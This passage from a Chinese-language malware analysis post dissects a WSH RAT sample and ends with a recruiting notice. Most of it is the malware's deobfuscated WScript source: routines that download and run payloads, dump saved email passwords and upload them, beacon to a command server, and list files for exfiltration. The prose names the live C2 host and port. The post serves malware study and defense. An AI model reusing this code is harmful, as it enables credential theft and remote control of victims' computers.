    shellobj.run("%comspec% /c taskkill /F /IM " + filename, 0, true);
    try {
        filesystemobj.deleteFile(installdir + filename + "data");
    } catch (ey) {}
    var config_file = installdir + filename.substr(0, filename.lastIndexOf(".")) + ".cfg";
    var cfg = "[General]nShowGridLines=0nSaveFilterIndex=0nShowInfoTip=1nUseProfileFolder=0nProfileFolder=nMarkOddEvenRows=0nWinPos=2C 00 00 00 00 00 00 00 01 00 00 00 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 00 00 00 00 00 00 00 00 80 02 00 00 E0 01 00 00nColumns=FA 00 00 00 FA 00 01 00 6E 00 02 00 6E 00 03 00 78 00 04 00 78 00 05 00 78 00 06 00 64 00 07 00 FA 00 08 00nSort=0";
    //write config
    var writer = filesystemobj.openTextFile(config_file, 2, true);
    writer.writeLine(cfg);
    writer.close();
    writer = null;
    var strlink = fileurl;
    var strsaveto = installdir + filename;
    var objhttpdownload = WScript.CreateObject("msxml2.xmlhttp");
    objhttpdownload.open("get", strlink, false);
    objhttpdownload.setRequestHeader("cache-control:", "max-age=0");
    objhttpdownload.send();
    var objfsodownload = WScript.CreateObject("scripting.filesystemobject");
    if (objfsodownload.fileExists(strsaveto)) {
        objfsodownload.deleteFile(strsaveto);
    }
    if (objhttpdownload.status == 200) {
        var objstreamdownload = WScript.CreateObject("adodb.stream");
        objstreamdownload.Type = 1;
        objstreamdownload.Open();
        objstreamdownload.Write(objhttpdownload.responseBody);
        objstreamdownload.SaveToFile(strsaveto);
        objstreamdownload.close();
        objstreamdownload = null;
    }
    if (objfsodownload.fileExists(strsaveto)) {
        var runner = WScript.CreateObject("Shell.Application");
        var saver = objfsodownload.getFile(strsaveto).shortPath
        // Original comment says "try 10 times before giveup"; the loop actually runs 5 times.
        for (var i = 0; i < 5; i++) {
            shellobj.run("%comspec% /c taskkill /F /IM " + filename, 0, true);
            WScript.sleep(1000);
            runner.shellExecute(saver, " /stext " + saver + "data");
            WScript.sleep(2000);
            if (objfsodownload.fileExists(saver + "data")) {
                var sr = filesystemobj.openTextFile(saver + "data");
                var buffer = sr.readall();
                sr.close();
                sr = null;
                var outpath = installdir + "wshlogs\recovered_password_email.log";
                var folder = objfsodownload.GetParentFolderName(outpath);
                if (!objfsodownload.FolderExists(folder)) {
                    shellobj.run("%comspec% /c mkdir "" + folder + """, 0, true);
                }
                writer = filesystemobj.openTextFile(outpath, 2, true);
                writer.write(buffer);
                writer.close();
                writer = null;
                upload(saver + "data", retcmd);
                break;
            }
        }
        deletefaf(strsaveto);
    }
}
function keyloggerstarter(fileurl, filename, filearg, is_offline) {
    // Downloads and starts a keylogger component (body elided on the page).
}
// Downloads a plugin executable from fileurl to <installdir><filename> and runs
// it as "<file>" <host> <port> "<filearg>", i.e. the plugin receives the C2
// address on its command line. Reports "Access+Denied" if the file cannot be
// written.
function servicestarter(fileurl, filename, filearg) {
    shellobj.run("%comspec% /c taskkill /F /IM " + filename, 0, true);
    var strlink = fileurl;
    var strsaveto = installdir + filename;
    var objhttpdownload = WScript.CreateObject("msxml2.xmlhttp");
    objhttpdownload.open("get", strlink, false);
    objhttpdownload.setRequestHeader("cache-control:", "max-age=0");
    objhttpdownload.send();
    var objfsodownload = WScript.CreateObject("scripting.filesystemobject");
    if (objfsodownload.fileExists(strsaveto)) {
        objfsodownload.deleteFile(strsaveto);
    }
    if (objhttpdownload.status == 200) {
        try {
            var objstreamdownload = WScript.CreateObject("adodb.stream");
            objstreamdownload.Type = 1;
            objstreamdownload.Open();
            objstreamdownload.Write(objhttpdownload.responseBody);
            objstreamdownload.SaveToFile(strsaveto);
            objstreamdownload.close();
            objstreamdownload = null;
        } catch (err) {
            updatestatus("Access+Denied");
        }
    }
    if (objfsodownload.fileExists(strsaveto)) {
        shellobj.run(""" + strsaveto + "" " + host + " " + port + " "" + filearg + """);
    }
}
// Download-and-execute: fetches fileurl (via msxml2.serverxmlhttp, which
// bypasses WinINet proxy/cookie settings) to <installdir><filename>, runs it by
// short path and reports "Executed+File" to the C2.
function sitedownloader(fileurl, filename) {
    var strlink = fileurl;
    var strsaveto = installdir + filename;
    var objhttpdownload = WScript.CreateObject("msxml2.serverxmlhttp");
    objhttpdownload.open("get", strlink, false);
    objhttpdownload.setRequestHeader("cache-control", "max-age=0");
    objhttpdownload.send();
    var objfsodownload = WScript.CreateObject("scripting.filesystemobject");
    if (objfsodownload.fileExists(strsaveto)) {
        objfsodownload.deleteFile(strsaveto);
    }
    if (objhttpdownload.status == 200) {
        var objstreamdownload = WScript.CreateObject("adodb.stream");
        objstreamdownload.Type = 1;
        objstreamdownload.Open();
        objstreamdownload.Write(objhttpdownload.responseBody);
        objstreamdownload.SaveToFile(strsaveto);
        objstreamdownload.close();
        objstreamdownload = null;
    }
    if (objfsodownload.fileExists(strsaveto)) {
        shellobj.run(objfsodownload.getFile(strsaveto).shortPath);
        updatestatus("Executed+File");
    }
}
function download(fileurl, filedir) {
    // Downloads a file to filedir (body elided on the page).
}
// Fire-and-forget status report: POST to http://host:port/update-status|<msg>
// with the fingerprint as User-Agent (header name printed with a trailing colon).
function updatestatus(status_msg) {
    try {
        var objsoc = WScript.CreateObject("msxml2.xmlhttp");
        objsoc.open("post", "http://" + host + ":" + port + "/" + "update-status" + spliter + status_msg, false);
        objsoc.setRequestHeader("user-agent:", information());
        objsoc.send("");
    } catch (err) {}
}
function upload(fileurl, retcmd) {
    // Uploads a local file to the C2 (body elided on the page).
}
// Deletes a path whether it is a file or a folder; the first call that fails
// ends the attempt (deleteFolder is only reached if deleteFile succeeded).
function deletefaf(url) {
    try {
        filesystemobj.deleteFile(url);
        filesystemobj.deleteFolder(url);
    } catch (err) {}
}
function cmdshell(cmd) {
    // Executes a command and returns its output (body elided on the page).
    return readallfromany;
}
function enumprocess() {
    // Enumerates all processes: pid, name, path, etc. (body elided on the page).
    return ep;
}
function exitprocess(pid) {
    // Terminates the process with the given pid (body elided on the page).
}
// Parent folder of a file path (resolved through a File object first).
function getParentDirectory(path) {
    var fo = filesystemobj.getFile(path);
    return filesystemobj.getParentFolderName(fo);
}
// Directory listing for the C2: subfolders as "<name>^^d^<attributes>|" and
// files as "<name>^<size>^<attributes>|". Returns whatever was collected
// before an error (errors are swallowed).
function enumfaf(enumdir) {
    var re = "";
    try {
        for (var fi = new Enumerator(filesystemobj.getFolder(enumdir).subfolders); !fi.atEnd(); fi.moveNext()) {
            var folder = fi.item();
            re = re + folder.name + "^^d^" + folder.attributes + spliter;
        }
        for (var fi = new Enumerator(filesystemobj.getFolder(enumdir).files); !fi.atEnd(); fi.moveNext()) {
            var file = fi.item();
            re = re + file.name + "^" + file.size + "^" + file.attributes + spliter;
        }
    } catch (err) {}
    return re;
}
可以看到这个脚本首先会尝试提权,然后从pluginsrv1.duckdns.org:7756读取命令,可以执行计算机命令。并且会安装SDK,设置该脚本为开机自动启动
jar文件分析
根据清单文件,会先执行operational.Jrat类中的main函数,该函数实际执行了iiiiiiiiii.class。如果执行该class失败,则会重复尝试
iiiiiiiiii.class实际上是一个jar包,微步云沙箱检测结果如下
经过粗略分析,该类包括解密脚本,写入文件,执行脚本等恶意行为。
总结
该程序包含多次脚本解密,脚本混淆,给分析带来极大困难。“套娃”式地将攻击脚本隐藏得非常深。主要使用wscript执行,同时包含一些java代码。
防范方法
APT报告中提到该程序主要通过钓鱼邮件传播,而钓鱼邮件一般都包含了特定的社会工程因素。提醒计算机使用者,一定要找到官方链接点击,千万不要执行来源不明的程序,点击来源不明的链接。该病毒已经被各杀软平台识别,所以计算机一定要安装杀毒软件。
参考链接
- 黑客购买新型WSH RAT最新变种样本,攻击银行客户–FreeBuf
- WScript–百度百科
- ADO Stream Object–w3school
- 微步云沙箱
- app.any.run分析报告
end
招新小广告
ChaMd5 Venom 招收大佬入圈
新成立组IOT+工控+样本分析+AI 长期招新